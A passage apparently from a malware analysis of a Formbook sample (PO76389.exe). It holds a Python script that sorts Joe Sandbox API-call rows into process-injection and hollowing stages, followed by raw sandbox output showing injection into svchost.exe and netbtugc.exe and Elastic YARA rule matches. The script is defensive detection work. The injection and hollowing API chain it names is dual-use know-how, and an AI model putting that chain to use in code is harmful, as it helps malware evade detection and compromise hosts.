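    r"Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02FD2EE0",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02FD2D30",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02FD2D10",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2FB0 NtResumeThread,LdrInitializeThunk,5_2_02FD2FB0",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2E30 NtWriteVirtualMemory,5_2_02FD2E30",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2F60 NtCreateProcessEx,5_2_02FD2F60",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2CF0 NtOpenProcess,5_2_02FD2CF0",
    r"Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F702F: CreateFileW,DeviceIoControl,CloseHandle,0_2_004F702F",
    r"Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004DBDF60_2_004DBDF6",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03187E54 appears 96 times",
]

# <process index>_<run>_<address>; the report repeats this id at the end of each row as link text.
LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8}):?\s*(?P<detail>.*?)\s*$"
)
NATIVE_RE = re.compile(r"^(Nt|Zw)[A-Z]")

# Heuristic stage sets for this example (not a Joe Sandbox signature definition).
STAGES = {
    "open_target": {"NtOpenProcess", "NtOpenThread"},
    "allocate": {"NtAllocateVirtualMemory", "NtCreateSection", "NtMapViewOfSection"},
    "write": {"NtWriteVirtualMemory"},
    "execute": {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread", "NtCreateThreadEx"},
    "hollow": {"NtUnmapViewOfSection", "NtCreateProcessEx"},
}
REQUIRED_FOR_CHAIN = ("open_target", "allocate", "write", "execute")


def image_name(path):
    """Last component of a Windows or POSIX path (os.path would not split backslashes on Linux)."""
    return re.split(r"[\\/]", path)[-1]


def parse_code_functions(lines):
    """Return one record per 'Code function' row; rows of other kinds are skipped."""
    records = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        fid = m["fid"]
        calls = [c.strip() for c in m["detail"].split(",")]
        calls = [c for c in calls if c and c != fid]  # drop blanks and the repeated anchor id
        records.append({
            "process": image_name(m["src"]),
            "process_index": int(fid.split("_")[0]),
            "function": fid,
            "calls": calls,
        })
    return records


def triage(lines):
    """Per process image: resolved native calls, injection stages covered, and whether
    every stage of the chain is present. Keyed by image name."""
    acc = defaultdict(lambda: {"functions": 0, "native": set(), "other": set(), "ldr": 0})
    for rec in parse_code_functions(lines):
        p = acc[rec["process"]]
        p["functions"] += 1
        for call in rec["calls"]:
            (p["native"] if NATIVE_RE.match(call) else p["other"]).add(call)
        if "LdrInitializeThunk" in rec["calls"]:
            p["ldr"] += 1
    result = {}
    for proc, p in acc.items():
        stages = {name: sorted(p["native"] & apis) for name, apis in STAGES.items()}
        result[proc] = {
            "functions": p["functions"],
            "native_calls": sorted(p["native"]),
            "other_calls": sorted(p["other"]),
            "stages": stages,
            "full_injection_chain": all(stages[s] for s in REQUIRED_FOR_CHAIN),
            "hollowing_primitives": stages["hollow"],
            "ldr_thunk_stubs": p["ldr"],
        }
    return result


if __name__ == "__main__":
    for proc, info in triage(REPORT_LINES).items():
        chain = "FULL CHAIN" if info["full_injection_chain"] else "partial"
        print(f"{proc}: {len(info['native_calls'])} native calls, injection {chain}, "
              f"hollowing={info['hollowing_primitives']}")
```

Run against the full listing, the same function separates the injected svchost.exe (which in this section resolves only query and key APIs plus NtOpenProcess) from netbtugc.exe, which holds open, allocate/map, write and execute primitives as well as NtUnmapViewOfSection and NtCreateProcessEx.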
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004F702F CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004EB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746C5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004F82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004DBDF6
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004BA0C0
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004D0183
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004F220C
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004B8530
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004D0677
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004B6670
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004E8779
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_0051A8DC
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004D0A8F
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004B6BBC
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004DAC83
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004B8CA0
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004CAD5C
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004D0EC4
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004E4EBF
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_005130AD
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004E113E
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004D12F9
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004E542F
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_0051F5D0
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004C3680
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004E599F
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004DDA74
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004BDCD0
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004B5D32
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004BBDF0
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004D1E5A
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004DDF69
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004E7FFD
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004FBFB8
Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_00DA29F8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02538573
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02522A30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0254EAD3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02530033
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02523097
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0252E0B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_025230A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0252FE13
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_025226A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02536753
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0253674E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02523430
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_025224D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0312D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0318739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0315B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031C02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03130100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0320B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0312F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0317516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0314B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03164750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0313C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0315C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03200591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031F2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03131460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031EE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0315FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031F6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0317DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03185AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03149950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0315B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0320A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03142840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0314A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0316E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03160F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03182F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03141F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03132FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0314CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03140E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03152E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03149EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0314AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03143D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03158DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0315FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0313ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03140C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03130CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FFCF2
Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Code function: 4_2_027BD2C1
Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Code function: 4_2_027BD2C6
Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Code function: 4_2_027B6BA6
Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Code function: 4_2_027B6986
Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Code function: 4_2_027D5646
Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Code function: 4_2_027B4C26
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305A352
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_030603E6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FAE3F0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03040274
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_030202C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0303A118
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03028158
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_030601AA
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_030581CC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03032000
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F90100
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FBC6E0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F9C7C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA0770
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FC4750
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03060591
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03044420
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03052446
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA0535
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0304E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305AB40
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F9EA80
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03056BD7
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FCE8F0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F868B8
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0306A9A6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA2840
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FAA840
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA29A0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FB6962
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03042F30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03014F40
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FB2E90
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0301EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA0E59
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FACFE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305EE26
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F92FC8
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305CE93
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FC0F30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FE2F28
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305EEDB
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F90CF2
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0303CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA0C00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F9ADE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FB8DBF
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03040CB5
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FAAD00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305132D
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FBB2C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA52A0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FE739A
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F8D34C
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_030412ED
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA70C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0306B16B
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FAB1B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F8F172
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD516C
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0304F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305F0E0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_030570E9
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305F7B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_030516CC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03057571
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F91460
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0303D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305F43F
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FE5AA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305FB76
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03015BF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FDDBF9
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03057A46
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305FA49
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03013A6C
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FBFB80
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03041AA3
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0303DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0304DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03035910
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA38E0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0300D800
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA9950
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FBB950
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305FF09
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA9EB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305FFB1
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F63FD5
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F63FD2
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA1F92
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03051D5A
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03057D73
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03019C32
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FBFDC0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FA3D40
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0305FCF2
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_00611810
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0060C760
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0060C980
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0060AA00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_00614EC0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_006130A0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0061309B
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0062B420
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02CAE2E8
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02CAE7A8
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02CAE403
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02CAD808
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03187E54 appears 96 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0312B970 appears 268 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03175130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 031BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 031AEA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02FD5130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 0300EA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02FE7E54 appears 102 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02F8B970 appears 275 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 0301F290 appears 105 times
Source: C:\Users\user\Desktop\PO76389.exe | Code function: String function: 004CF885 appears 68 times
Source: C:\Users\user\Desktop\PO76389.exe | Code function: String function: 004D7750 appears 42 times
Source: PO76389.exe | Static PE information: Resource name: RT_VERSION, type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: PO76389.exe, 00000000.00000003.2096156829.00000000041AD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO76389.exe
Source: PO76389.exe, 00000000.00000003.2093249461.0000000003FB3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO76389.exe
Source: PO76389.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
